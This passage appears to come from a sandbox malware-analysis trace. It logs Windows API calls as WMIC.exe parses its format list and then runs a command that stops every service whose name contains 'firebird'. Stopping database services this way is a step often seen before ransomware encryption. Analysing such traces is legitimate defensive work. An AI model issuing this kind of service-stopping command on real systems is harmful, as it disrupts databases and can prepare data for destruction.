namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.214] free (_Block=0x381adc8) [0290.214] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0290.214] malloc (_Size=0xc) returned 0x381ad08 [0290.214] malloc (_Size=0xc) returned 0x381ad20 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] SysStringLen (param_1="TABLE") returned 0x5 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] SysStringLen (param_1="XML") returned 0x3 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.214] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.214] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0290.214] malloc (_Size=0x18) returned 0x3812a40 [0290.218] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.219] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.219] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.219] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=15, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.219] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="htable.xsl") returned 0x0 [0290.219] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.219] malloc (_Size=0xc) returned 0x381ab70 [0290.219] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.219] free (_Block=0x381ab70) [0290.219] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0290.219] malloc (_Size=0xc) returned 0x381ac48 [0290.220] malloc (_Size=0xc) returned 0x381ab88 [0290.220] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.220] SysStringLen (param_1="TABLE") returned 0x5 [0290.220] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.220] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.220] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.220] SysStringLen (param_1="XML") returned 0x3 [0290.220] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.220] SysStringLen (param_1="texttablewsys") returned 0xd [0290.220] SysStringLen (param_1="XML") returned 0x3 [0290.220] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.220] malloc (_Size=0x18) returned 0x3812b20 [0290.220] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.220] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.220] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.220] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=16, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.220] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="htable.xsl") returned 0x0 [0290.220] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.221] malloc (_Size=0xc) returned 0x381aba0 [0290.221] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.221] free (_Block=0x381aba0) [0290.221] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0290.221] malloc (_Size=0xc) returned 0x381adc8 [0290.221] malloc (_Size=0xc) returned 0x381ad80 [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] SysStringLen (param_1="TABLE") returned 0x5 [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] SysStringLen (param_1="XML") returned 0x3 [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] SysStringLen (param_1="texttablewsys") returned 0xd [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0290.221] SysStringLen (param_1="XML") returned 0x3 [0290.221] SysStringLen (param_1="htable-sortby") returned 0xd [0290.221] malloc (_Size=0x18) returned 0x3812a80 [0290.222] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.222] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.222] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.222] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=17, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.222] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="mof.xsl") returned 0x0 [0290.222] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.222] malloc (_Size=0xc) returned 0x381ade0 [0290.222] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.222] free (_Block=0x381ade0) [0290.222] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0290.222] malloc (_Size=0xc) returned 0x381adf8 [0290.222] malloc (_Size=0xc) returned 0x381ad50 [0290.222] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.222] SysStringLen (param_1="TABLE") returned 0x5 [0290.223] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.223] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.223] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.223] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.223] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.223] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.223] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.223] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.223] malloc (_Size=0x18) returned 0x3812c00 [0290.223] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.223] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.223] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.223] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=18, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.223] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="mof.xsl") returned 0x0 [0290.223] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.223] malloc (_Size=0xc) returned 0x381ade0 [0290.224] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.224] free (_Block=0x381ade0) [0290.224] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0290.224] malloc (_Size=0xc) returned 0x381ac30 [0290.224] malloc (_Size=0xc) returned 0x381ac00 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] SysStringLen (param_1="TABLE") returned 0x5 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0290.224] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.224] SysStringLen (param_1="wmiclimofformat") returned 0xf [0290.224] malloc (_Size=0x18) returned 0x3812cc0 [0290.224] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.225] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.225] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.225] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=19, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.225] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="textvaluelist.xsl") returned 0x0 [0290.225] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.225] malloc (_Size=0xc) returned 0x381ade0 [0290.225] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.225] free (_Block=0x381ade0) [0290.225] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0290.225] malloc (_Size=0xc) returned 0x381ade0 [0290.225] malloc (_Size=0xc) returned 0x381aba0 [0290.225] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.225] SysStringLen (param_1="TABLE") returned 0x5 [0290.226] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.226] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.226] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.226] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.226] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.226] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.226] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.226] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.226] malloc (_Size=0x18) returned 0x3812ae0 [0290.226] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.226] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.226] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.226] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=20, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.226] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="textvaluelist.xsl") returned 0x0 [0290.226] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.226] malloc (_Size=0xc) returned 0x381ab28 [0290.227] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.227] free (_Block=0x381ab28) [0290.227] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0290.227] malloc (_Size=0xc) returned 0x381ab28 [0290.227] malloc (_Size=0xc) returned 0x381ac60 [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] SysStringLen (param_1="TABLE") returned 0x5 [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0290.227] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.227] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0290.227] malloc (_Size=0x18) returned 0x38129a0 [0290.228] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.228] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.228] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.228] IUnknown:Release (This=0x3779ca0) returned 0x0 [0290.228] FreeThreadedDOMDocument:IUnknown:Release (This=0x3776b48) returned 0x1 [0290.228] FreeThreadedDOMDocument:IUnknown:Release (This=0x37745a8) returned 0x0 [0290.228] free (_Block=0x38199a0) [0290.228] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice" [0290.228] malloc (_Size=0xe0) returned 0x381aee8 [0290.228] memcpy_s (in: _Destination=0x381aee8, _DestinationSize=0xde, _Source=0x3531b78, _SourceSize=0xd0 | out: _Destination=0x381aee8) returned 0x0 [0290.228] malloc (_Size=0xc) returned 0x381ac78 [0290.228] malloc (_Size=0xc) returned 0x381ab70 [0290.228] malloc (_Size=0xc) returned 0x381ab58 [0290.229] malloc (_Size=0xc) returned 0x381ac90 [0290.229] malloc (_Size=0x80) returned 0x381afd0 [0290.229] GetLocalTime (in: lpSystemTime=0x2f8f610 | out: lpSystemTime=0x2f8f610*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x38, wMilliseconds=0x112)) [0290.229] _vsnwprintf (in: _Buffer=0x381afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2f8f5f0 | out: _Buffer="04-02-2020T08:28:56") returned 19 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] malloc (_Size=0x8c) returned 0x381b058 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] malloc (_Size=0x8c) returned 0x381b0f0 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.229] malloc (_Size=0xa) returned 0x381abb8 [0290.229] lstrlenW (lpString="path") returned 4 [0290.229] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0290.229] malloc (_Size=0xa) returned 0x381acc0 [0290.229] malloc (_Size=0x4) returned 0x3812ee8 [0290.229] free (_Block=0x0) [0290.230] free (_Block=0x381abb8) [0290.230] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.230] malloc (_Size=0x1c) returned 0x3819da8 [0290.230] lstrlenW (lpString="Win32_Service") returned 13 [0290.230] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0290.230] malloc (_Size=0x1c) returned 0x3810568 [0290.230] malloc (_Size=0x8) returned 0x3810590 [0290.230] memmove_s (in: _Destination=0x3810590, _DestinationSize=0x4, _Source=0x3812ee8, _SourceSize=0x4 | out: _Destination=0x3810590) returned 0x0 [0290.230] free (_Block=0x3812ee8) [0290.230] free (_Block=0x0) [0290.230] free (_Block=0x3819da8) [0290.230] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.230] malloc (_Size=0xc) returned 0x381abb8 [0290.230] lstrlenW (lpString="where") returned 5 [0290.230] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0290.230] malloc (_Size=0xc) returned 0x381abd0 [0290.230] malloc (_Size=0xc) returned 0x381ac18 [0290.230] memmove_s (in: _Destination=0x381ac18, _DestinationSize=0x8, _Source=0x3810590, _SourceSize=0x8 | out: _Destination=0x381ac18) returned 0x0 [0290.230] free (_Block=0x3810590) [0290.230] free (_Block=0x0) [0290.230] free (_Block=0x381abb8) [0290.230] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.230] malloc (_Size=0x36) returned 0x381b188 [0290.230] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0290.230] _wcsicmp (_String1="\"name like '%%firebird%%'\"", _String2="\"NULL\"") returned -20 [0290.230] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0290.230] lstrlenW (lpString="\"name like '%%firebird%%'\"") returned 26 [0290.231] malloc (_Size=0x36) returned 0x381b1c8 [0290.231] malloc (_Size=0x10) returned 0x381acd8 [0290.231] memmove_s (in: _Destination=0x381acd8, _DestinationSize=0xc, _Source=0x381ac18, _SourceSize=0xc | out: _Destination=0x381acd8) returned 0x0 [0290.231] free (_Block=0x381ac18) [0290.231] free (_Block=0x0) [0290.231] free (_Block=0x381b188) [0290.231] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.231] malloc (_Size=0xa) returned 0x381abb8 [0290.231] lstrlenW (lpString="call") returned 4 [0290.231] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0290.231] malloc (_Size=0xa) returned 0x381ac18 [0290.231] malloc (_Size=0x18) returned 0x3812bc0 [0290.231] memmove_s (in: _Destination=0x3812bc0, _DestinationSize=0x10, _Source=0x381acd8, _SourceSize=0x10 | out: _Destination=0x3812bc0) returned 0x0 [0290.231] free (_Block=0x381acd8) [0290.231] free (_Block=0x0) [0290.231] free (_Block=0x381abb8) [0290.231] lstrlenW (lpString=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice") returned 69 [0290.231] malloc (_Size=0x18) returned 0x3812b80 [0290.231] lstrlenW (lpString="stopservice") returned 11 [0290.231] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0290.231] malloc (_Size=0x18) returned 0x3812ba0 [0290.231] free (_Block=0x0) [0290.231] free (_Block=0x3812b80) [0290.231] malloc (_Size=0x18) returned 0x3812b80 [0290.231] lstrlenW (lpString="QUIT") returned 4 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0290.232] lstrlenW (lpString="EXIT") returned 4 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0290.232] free (_Block=0x3812b80) [0290.232] WbemLocator:IUnknown:AddRef (This=0x35447f0) returned 0x2 [0290.232] malloc (_Size=0x18) returned 0x3812b80 [0290.232] lstrlenW (lpString="/") returned 1 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0290.232] lstrlenW (lpString="-") returned 1 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0290.232] lstrlenW (lpString="CLASS") returned 5 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0290.232] lstrlenW (lpString="PATH") returned 4 [0290.232] lstrlenW (lpString="path") returned 4 [0290.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0290.233] lstrlenW (lpString="/") returned 1 [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0290.233] lstrlenW (lpString="-") returned 1 [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] malloc (_Size=0x1c) returned 0x3819da8 [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xa9ab0183 | out: _String="Win32_Service", _Context=0xa9ab0183) returned="Win32_Service" [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] malloc (_Size=0x1c) returned 0x381b188 [0290.233] lstrlenW (lpString="Win32_Service") returned 13 [0290.233] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xa9ab0183 | out: _String=0x0, _Context=0xa9ab0183) returned 0x0 [0290.233] lstrlenW (lpString="") returned 0 [0290.233] lstrlenW (lpString="WHERE") returned 5 [0290.234] lstrlenW (lpString="where") returned 5 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0290.234] lstrlenW (lpString="/") returned 1 [0290.234] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%firebird%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0290.234] lstrlenW (lpString="-") returned 1 [0290.234] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%firebird%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0290.234] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0290.234] malloc (_Size=0x32) returned 0x381b208 [0290.234] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0290.234] lstrlenW (lpString="/") returned 1 [0290.234] lstrlenW (lpString="call") returned 4 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0290.234] lstrlenW (lpString="-") returned 1 [0290.234] lstrlenW (lpString="call") returned 4 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0290.234] lstrlenW (lpString="call") returned 4 [0290.234] malloc (_Size=0xa) returned 0x381acd8 [0290.234] lstrlenW (lpString="call") returned 4 [0290.234] lstrlenW (lpString="GET") returned 3 [0290.234] lstrlenW (lpString="call") returned 4 [0290.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0290.234] lstrlenW (lpString="LIST") returned 4 [0290.234] lstrlenW (lpString="call") returned 4 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0290.235] lstrlenW (lpString="SET") returned 3 [0290.235] lstrlenW (lpString="call") returned 4 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0290.235] lstrlenW (lpString="CREATE") returned 6 [0290.235] lstrlenW (lpString="call") returned 4 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0290.235] lstrlenW (lpString="CALL") returned 4 [0290.235] lstrlenW (lpString="call") returned 4 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0290.235] lstrlenW (lpString="/") returned 1 [0290.235] lstrlenW (lpString="stopservice") returned 11 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0290.235] lstrlenW (lpString="-") returned 1 [0290.235] lstrlenW (lpString="stopservice") returned 11 [0290.235] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0290.235] lstrlenW (lpString="stopservice") returned 11 [0290.235] malloc (_Size=0x18) returned 0x3812c20 [0290.235] lstrlenW (lpString="stopservice") returned 11 [0290.235] ??0CHString@@QAE@XZ () returned 0x2f8d4d4 [0290.235] GetCurrentThreadId () returned 0x11d4 [0290.235] GetCurrentThreadId () returned 0x11d4 [0290.235] ??0CHString@@QAE@XZ () returned 0x2f8d45c [0290.235] malloc (_Size=0x4) returned 0x3812ee8 [0290.235] malloc (_Size=0xc) returned 0x381abb8 [0290.236] malloc (_Size=0xc) returned 0x381ae28 [0290.236] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35447f0, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x354aeb0) returned 0x0 [0290.299] free (_Block=0x381ae28) [0290.299] CoSetProxyBlanket (pProxy=0x354aeb0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0290.300] free (_Block=0x3812ee8) [0290.300] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0290.300] free (_Block=0x381abb8) [0290.300] malloc (_Size=0xc) returned 0x381abb8 [0290.300] IWbemServices:GetObject (in: This=0x354aeb0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2f8d4ec*=0x0, ppCallResult=0x0 | out: ppObject=0x2f8d4ec*=0x35a0ae0, ppCallResult=0x0) returned 0x0 [0290.397] free (_Block=0x381abb8) [0290.397] IWbemClassObject:BeginMethodEnumeration (This=0x35a0ae0, lEnumFlags=0) returned 0x0 [0290.397] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="StartService", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x35a0cd8) returned 0x0 [0290.398] lstrlenW (lpString="StartService") returned 12 [0290.398] lstrlenW (lpString="stopservice") returned 11 [0290.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0290.398] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.398] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="StopService", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x35a0cd8) returned 0x0 [0290.398] lstrlenW (lpString="StopService") returned 11 [0290.398] lstrlenW (lpString="stopservice") returned 11 [0290.398] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0290.398] malloc (_Size=0x38) returned 0x381b9b8 [0290.398] ??0CHString@@QAE@XZ () returned 0x2f8d03c [0290.399] GetCurrentThreadId () returned 0x11d4 [0290.399] IWbemClassObject:GetNames (in: This=0x35a0cd8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x2f8d04c | out: pNames=0x2f8d04c*="\x01ƀ\x04") returned 0x0 [0290.400] SafeArrayGetLBound (in: psa=0x35a1600, nDim=0x1, plLbound=0x2f8d038 | out: plLbound=0x2f8d038) returned 0x0 